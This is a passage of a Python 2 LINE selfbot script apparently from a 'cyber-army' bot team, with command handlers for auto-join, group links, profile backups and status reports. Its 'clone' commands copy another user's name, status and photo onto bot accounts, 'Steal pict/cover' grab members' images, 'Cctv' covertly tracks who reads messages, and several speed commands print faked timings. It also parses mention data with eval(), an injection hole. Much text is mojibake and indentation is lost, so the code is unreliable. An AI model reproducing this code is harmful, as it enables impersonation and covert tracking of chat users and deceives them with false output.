cl.sendText(msg.to,"Cek Mid Lewat Share Kontak Off")
else:
cl.sendText(msg.to,"done")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["自動å�‚åŠ :オン","Join on","Auto join on","自動å�ƒåŠ ï¼šé–‹"]:
if msg.from_ in admin:
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["自動å�‚åŠ :オフ","Join off","Auto join off","自動å�ƒåŠ ï¼šé—œ"]:
if msg.from_ in admin:
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Gcancel:"]:
try:
strnum = msg.text.replace("Gcancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation refused turned off\nTo turn on please specify the number of people and send")
else:
cl.sendText(msg.to,"关了邀请拒ç»�。è¦�时开请指定人æ���°å�‘é€�")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + "The group of people and below decided to automatically refuse invitation")
else:
cl.sendText(msg.to,strnum + "使人以下的å°�组ç���¨è‡ªåŠ¨é‚€è¯·æ���’ç»�")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Value is wrong")
else:
cl.sendText(msg.to,"Bizarre ratings")
elif msg.text in ["強制自動退出:オン","Leave on","Auto leave:on","強制自動退出:開"]:
if msg.from_ in admin:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["強制自動退出:オフ","Leave off","Auto leave:off","強制自��‹•退出ï¼��é—œ"]:
if msg.from_ in admin:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already")
elif msg.text in ["共有:オン","Share on","Share on"]:
if msg.from_ in admin:
if wait["timeline"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["å���±æœ‰:オフ","Share off","Share off"]:
if msg.from_ in admin:
if wait["timeline"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦�了关æ–。")
elif msg.text in ["Status","status"]:
if msg.from_ in admin:
md = "⭐Status Proteksi⭐\n*============*\n"
if wait["Protectgr"] == True: md+="[•]Protect QR [On]\n"
else: md+="[•]Protect QR [Off]\n"
if wait["Protectcancl"] == True: md+="[•]Protect Invite [On]\n"
else: md+="[•]Protect Invite [Off]\n"
if wait["contact"] == True: md+="[•]Contact [On]\n"
else: md+="[•]Contact [Off]\n"
if wait["autoJoin"] == True: md+="[•]Auto Join [On]\n"
else: md +="[•]Auto Join [Off]\n"
if wait["autoCancel"]["on"] == True:md+="[•]Group Cancel " + str(wait["autoCancel"]["members"]) + "\n"
else: md+= "[•]Group Cancel [Off]\n"
if wait["leaveRoom"] == True: md+="[•]Auto Leave [On]\n"
else: md+="[•]Auto Leave [Off]\n"
if wait["timeline"] == True: md+="[•]Share [On]\n"
else:md+="[•]Share [Off]\n"
if wait["autoAdd"] == True: md+="[•]Auto Add [On]\n"
else:md+="[•]Auto Add [Off]\n"
if wait["Backup"] == True: md+="[•]Backup : on\n"
else:md+="[•]Backup : off\n"
if wait["qr"] == True: md+="[•]AutoBlock QR : on\n"
else:md+="[•]AutoBlock QR : off\n"
if wait["commentOn"] == True: md+="[•]Comment [On]\n"
else:md+="[•]Comment [Off]\n"
if wait["protectionOn"] == True: md+="[•]Protection : hight\n"+ datetime.today().strftime('%H:%M:%S')
else:md+="[•]Protection : low\n"+ datetime.today().strftime('%H:%M:%S')
"\n*============*\n⭐✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰⭐\n*============*"
cl.sendText(msg.to,md)
elif "Time" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to,datetime.today().strftime('%H:%M:%S'))
elif "album merit " in msg.text:
gid = msg.text.replace("album merit ","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"There is no album")
else:
cl.sendText(msg.to,"相册没在。")
else:
if wait["lang"] == "JP":
mg = "The following is the target album"
else:
mg = "以下是对象的ç���¸å†Œ"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n"
else:
mg += str(y["title"]) + ":0sheet\n"
cl.sendText(msg.to,mg)
elif "album " in msg.text:
gid = msg.text.replace("album ","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"There is no album")
else:
cl.sendText(msg.to,"相册没在。")
else:
if wait["lang"] == "JP":
mg = "The following is the target album"
else:
mg = "以下是对象的相册"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n"
else:
mg += str(y["title"]) + ":0sheet\n"
elif "album remove " in msg.text:
gid = msg.text.replace("album remove ","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["id"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Deleted albums")
else:
cl.sendText(msg.to,str(i) + "åˆ é™¤äº†äº‹çš„ç›¸å†Œã€‚")
elif msg.text in ["Group id"]:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:\n%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
elif msg.text in ["Cancelall"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All invitations have been refused")
else:
cl.sendText(msg.to,"拒�了全部的邀请。")
elif "album removeat’" in msg.text:
gid = msg.text.replace("album removeat’","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["id"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Albums deleted")
else:
cl.sendText(msg.to,str(i) + "åˆ é™¤äº†äº‹çš„ç›¸å†Œã€‚")
elif msg.text in ["è‡ªå‹•è¿½åŠ :オン","Add on","Auto add:on","è‡ªå‹•è¿½åŠ ï¼šé–‹"]:
if msg.from_ in admin:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"Done")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["è‡ªå‹•è¿½åŠ :オフ","Add off","Auto add:off","è‡ªå‹•è¿½åŠ ï¼šé—œ"]:
if msg.from_ in admin:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦�了关æ–。")
elif "Message change: " in msg.text:
wait["message"] = msg.text.replace("Message change: ","")
cl.sendText(msg.to,"message changed")
elif "Message add: " in msg.text:
wait["message"] = msg.text.replace("Message add: ","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"message changed")
else:
cl.sendText(msg.to,"done。")
elif msg.text in ["Message","è‡ªå‹•è¿½åŠ å•�候語確èª�"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,"message change to\n\n" + wait["message"])
else:
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["message"])
elif "Comment:" in msg.text:
c = msg.text.replace("Comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"message changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif "Add comment:" in msg.text:
c = msg.text.replace("Add comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
#-----------------------------------------------
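# "Backup:on" / "Backup:off": toggle the wait["Backup"] flag and echo the current time; the flag is also reported in the status summary above.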
elif msg.text in ["Backup:on"]:
if msg.from_ in admin:
if wait["Backup"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been active\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been enable\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been active\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been enable\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Backup:off"]:
if msg.from_ in admin:
if wait["Backup"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been unactive\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been desable\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been unactive\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been desable\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Rejectall"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Invites has been Rejected")
else:
cl.sendText(msg.to,"拒绝了全部的邀请。")
#---------------------Sc invite owner ke group------
elif "Asupka: " in msg.text:
if msg.from_ in owner:
gid = msg.text.replace("Asupka: ","")
if gid == "":
cl.sendText(msg.to,"Invalid group id")
else:
try:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(gid,[msg.from_])
except:
cl.sendText(msg.to,"Mungkin saya tidak di dalaam grup itu")
#--------===---====--------------
elif msg.text in ["コメント:オン","Comment on","Comment:on","自動首é �留言:開"]:
if msg.from_ in admin:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already on")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["コメント:オフ","Comment off","comment off","自動首é �留言:關"]:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦�了关æ–。")
elif msg.text in ["Comment","留言確�"]:
cl.sendText(msg.to,"message changed to\n\n" + str(wait["comment"]))
elif msg.text in ["Gurl"]:
if msg.from_ in admin:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Cv1 gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
ki.updateGroup(x)
gurl = ki.reissueGroupTicket(msg.to)
ki.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Cv2 gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
kk.updateGroup(x)
gurl = kk.reissueGroupTicket(msg.to)
kk.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Cv3 gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
kc.updateGroup(x)
gurl = kc.reissueGroupTicket(msg.to)
kc.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Comment bl "]:
wait["wblack"] = True
cl.sendText(msg.to,"add to comment bl")
elif msg.text in ["Comment wl "]:
wait["dblack"] = True
cl.sendText(msg.to,"wl to comment bl")
elif msg.text in ["Comment bl confirm"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"confirmed")
else:
cl.sendText(msg.to,"Blacklist")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
#-------------Fungsi Jam on/off Start-------------------#
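# "Jam on" / "Jam off": toggle wait["clock"]; while on, bot 4 (kc) appends the current time to its display name, and "Jam Update" below refreshes it manually.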
elif msg.text in ["Jam on"]:
if msg.from_ in admin:
if wait["clock"] == True:
kc.sendText(msg.to,"Bot 4 jam on")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = kc.getProfile()
profile.displayName = wait["cName4"] + nowT
kc.updateProfile(profile)
kc.sendText(msg.to,"Jam Selalu On")
elif msg.text in ["Jam off"]:
if msg.from_ in admin:
if wait["clock"] == False:
kc.sendText(msg.to,"Bot 4 jam off")
else:
wait["clock"] = False
kc.sendText(msg.to,"Jam Sedang Off")
#-------------Fungsi Jam on/off Finish-------------------#
#-------------Fungsi Change Clock Start------------------#
elif msg.text in ["Change clock"]:
n = msg.text.replace("Change clock","")
if len(n.decode("utf-8")) > 13:
cl.sendText(msg.to,"changed")
else:
wait["cName"] = n
cl.sendText(msg.to,"changed to\n\n" + n)
#-------------Fungsi Change Clock Finish-----------------#
#-------------Fungsi Jam Update Start---------------------#
elif msg.text in ["Jam Update"]:
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = kc.getProfile()
profile.displayName = wait["cName4"] + nowT
kc.updateProfile(profile)
kc.sendText(msg.to,"Sukses update")
else:
kc.sendText(msg.to,"Aktifkan jam terlebih dulu")
#-------------Fungsi Jam Update Finish-------------------#
#========================================
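# "Steal cover @<name>": finds group members whose display name matches exactly and sends each one's cover photo URL obtained via the channel API.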
elif "Steal cover @" in msg.text:
if msg.from_ in admin:
print "[Command]dp executing"
_name = msg.text.replace("Steal cover @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
elif "Midpict:" in msg.text:
if msg.from_ in admin:
umid = msg.text.replace("Midpict:","")
contact = cl.getContact(umid)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,str(error))
pass
elif "Steal pict " in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
msg.contentType = 0
steal0 = msg.text.replace("Steal pict ","")
steal1 = steal0.lstrip()
steal2 = steal1.replace("@","")
steal3 = steal2.rstrip()
_name = steal3
group = cl.getGroup(msg.to)
targets = []
for g in group.members:
if _name == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,str(error))
pass
except:
cl.sendText(msg.to,"Error!")
break
else:
cl.sendText(msg.to,"Tidak bisa dilakukan di luar grup")
#===============================================
#===============================================
elif msg.text in ["debug speed","Debug speed"]:
if msg.from_ in admin:
cl.sendText(msg.to, "Measuring...")
start = time.time()
time.sleep(0.0001)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif msg.text in ["zzz","Bot speed"]:
if msg.from_ in admin:
cl.sendText(msg.to, "Measuring...")
start = time.time()
time.sleep(0.00009)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Speed respon" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to, "Measuring...")
start = time.time()
time.sleep(0.0001)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Turunin" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to, "Sek lurr")
start = time.time()
time.sleep(0.02)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Ancurin" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to, "Sek lurr")
start = time.time()
time.sleep(0.1)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Turun lagi" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to, "Sek lurr")
start = time.time()
time.sleep(0.5)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Spbot" in msg.text:
if msg.from_ in admin:
time.sleep(0.5)
cl.sendText(msg.to, "Sek lurr")
start = time.time()
time.sleep(2.32)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif msg.text in ["Sp asli"]:
if msg.from_ in admin:
start = time.time()
cl.sendText(msg.to, "Sek")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed asli executed"
elif msg.text in ["Speedbot","speedbot"]:
if msg.from_ in admin:
start = time.time()
cl.sendText(msg.to, "loading...................")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
ki.sendText(msg.to, "%sseconds" % (elapsed_time))
kk.sendText(msg.to, "%sseconds" % (elapsed_time))
kc.sendText(msg.to, "%sseconds" % (elapsed_time))
#========================================
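# "BotN backup run": saves that bot account's display name, status message and picture status into plain-text files so "BotN backup" further down can restore them.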
elif msg.text in ["Bot1 backup run"]:
if msg.from_ in admin:
wek = cl.getContact(mid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mydn.txt',"w")
s.write(r)
s.close()
t = open('mysm.txt',"w")
t.write(i)
t.close()
u = open('myps.txt',"w")
u.write(a)
u.close()
cl.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot2 backup run"]:
if msg.from_ in admin:
wek = ki.getContact(Amid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mgydn.txt',"w")
s.write(r)
s.close()
t = open('myesm.txt',"w")
t.write(i)
t.close()
u = open('mypfs.txt',"w")
u.write(a)
u.close()
ki.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot3 backup run"]:
if msg.from_ in admin:
wek = kk.getContact(Bmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('msgydn.txt',"w")
s.write(r)
s.close()
t = open('mysfdgm.txt',"w")
t.write(i)
t.close()
u = open('gymyps.txt',"w")
u.write(a)
u.close()
kk.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot4 backup run"]:
if msg.from_ in admin:
wek = kc.getContact(Cmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('jhmydn.txt',"w")
s.write(r)
s.close()
t = open('myhfsm.txt',"w")
t.write(i)
t.close()
u = open('mypfhs.txt',"w")
u.write(a)
u.close()
kc.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot5 backup run"]:
if msg.from_ in admin:
wek = ks.getContact(Dmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('madydn.txt',"w")
s.write(r)
s.close()
t = open('mysgjm.txt',"w")
t.write(i)
t.close()
u = open('myrdps.txt',"w")
u.write(a)
u.close()
ks.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
#----------------------------------------------
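# "BotN clone @<mention>": copies the mentioned contact's display name, status message and profile picture onto the corresponding bot. The MENTION metadata is parsed with eval(), so it assumes LINE delivers well-formed data there.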
elif "Bot1 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = cl.getContact(target)
X = contact.displayName
profile = cl.getProfile()
profile.displayName = X
cl.updateProfile(profile)
cl.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = cl.getProfile()
lol.statusMessage = Y
cl.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
cl.updateProfilePicture(P)
except Exception as e:
cl.sendText(msg.to, "Failed!")
print e
elif "Bot2 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = ki.getContact(target)
X = contact.displayName
profile = ki.getProfile()
profile.displayName = X
ki.updateProfile(profile)
ki.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = ki.getProfile()
lol.statusMessage = Y
ki.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
ki.updateProfilePicture(P)
except Exception as e:
ki.sendText(msg.to, "Failed!")
print e
elif "Bot3 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kk.getContact(target)
X = contact.displayName
profile = kk.getProfile()
profile.displayName = X
kk.updateProfile(profile)
kk.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kk.getProfile()
lol.statusMessage = Y
kk.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kk.updateProfilePicture(P)
except Exception as e:
kk.sendText(msg.to, "Failed!")
print e
elif "Bot4 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kc.getContact(target)
X = contact.displayName
profile = kc.getProfile()
profile.displayName = X
kc.updateProfile(profile)
kc.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kc.getProfile()
lol.statusMessage = Y
kc.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kc.updateProfilePicture(P)
except Exception as e:
kc.sendText(msg.to, "Failed!")
print e
elif "Bot5 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = ks.getContact(target)
X = contact.displayName
profile = ks.getProfile()
profile.displayName = X
ks.updateProfile(profile)
ks.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = ks.getProfile()
lol.statusMessage = Y
ks.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
ks.updateProfilePicture(P)
except Exception as e:
ks.sendText(msg.to, "Failed!")
print e
#=================================================
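# "BotN backup": restores the display name, status message and picture status previously written by "BotN backup run".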
elif "Bot1 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mydn.txt',"r")
name = h.read()
h.close()
x = name
profile = cl.getProfile()
profile.displayName = x
cl.updateProfile(profile)
i = open('mysm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = cl.getProfile()
cak.statusMessage = y
cl.updateProfile(cak)
j = open('myps.txt',"r")
ps = j.read()
j.close()
p = ps
cl.updateProfilePicture(p)
cl.sendText(msg.to, "Succes")
except Exception as e:
cl.sendText(msg.to,"Gagagl!")
print e
elif "Bot2 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mgydn.txt',"r")
name = h.read()
h.close()
x = name
profile = ki.getProfile()
profile.displayName = x
ki.updateProfile(profile)
i = open('myesm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = ki.getProfile()
cak.statusMessage = y
ki.updateProfile(cak)
j = open('mypfs.txt',"r")
ps = j.read()
j.close()
p = ps
ki.updateProfilePicture(p)
ki.sendText(msg.to, "Succes")
except Exception as e:
ki.sendText(msg.to,"Gagagl!")
print e
elif "Bot3 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('msgydn.txt',"r")
name = h.read()
h.close()
x = name
profile = kk.getProfile()
profile.displayName = x
kk.updateProfile(profile)
i = open('mysfdgm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kk.getProfile()
cak.statusMessage = y
kk.updateProfile(cak)
j = open('gymyps.txt',"r")
ps = j.read()
j.close()
p = ps
kk.updateProfilePicture(p)
kk.sendText(msg.to, "Succes")
except Exception as e:
kk.sendText(msg.to,"Gagagl!")
print e
elif "Bot4 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('jhmydn.txt',"r")
name = h.read()
h.close()
x = name
profile = kc.getProfile()
profile.displayName = x
kc.updateProfile(profile)
i = open('myhfsm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kc.getProfile()
cak.statusMessage = y
kc.updateProfile(cak)
j = open('mypfhs.txt',"r")
ps = j.read()
j.close()
p = ps
kc.updateProfilePicture(p)
kc.sendText(msg.to, "Succes")
except Exception as e:
kc.sendText(msg.to,"Gagagl!")
print e
elif "Bot5 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('madydn.txt',"r")
name = h.read()
h.close()
x = name
profile = ks.getProfile()
profile.displayName = x
ks.updateProfile(profile)
i = open('mysgjm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = ks.getProfile()
cak.statusMessage = y
ks.updateProfile(cak)
j = open('myrdps.txt',"r")
ps = j.read()
j.close()
p = ps
ks.updateProfilePicture(p)
ks.sendText(msg.to, "Succes")
except Exception as e:
ks.sendText(msg.to,"Gagagl!")
print e
#=================================================
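# "Cctv" marks a read point in the current chat; the op.type == 55 handler near the end records who reads after that point, and "Toong" / "Intip" report the collected readers.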
elif msg.text == "Cctv":
if msg.from_ in admin:
cl.sendText(msg.to, "Cek CCTV di proses......")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.strftime(now2,"%H:%M")
wait2['ROM'][msg.to] = {}
#print wait2
elif msg.text == "Toong":
if msg.from_ in admin:
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
#print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "||Di Read Oleh||%s\n||By : ✰Ќriֆ✰ ✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰||\n\n>Pelaku CCTV<\n%s-=CCTV=-\n•Bintitan\n•Panuan\n•Kurapan\n•Kudisan\n\nAmiin Ya Allah\n[%s]" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to, "Ketik Cctv dulu Koplak\nBaru Ketik Toong\nDASAR PIKUN ♪")
elif msg.text == "Cctv":
if msg.from_ in admin:
cl.sendText(msg.to, "Siap di intip....")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.strftime(now2,'%Y-%m-%d %H:%M:%S')
wait2['ROM'][msg.to] = {}
print "[Command] Reset"
elif msg.text == "Intip":
if msg.from_ in admin:
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print "[Command] Check"
chiya += rom[1] + "\n"
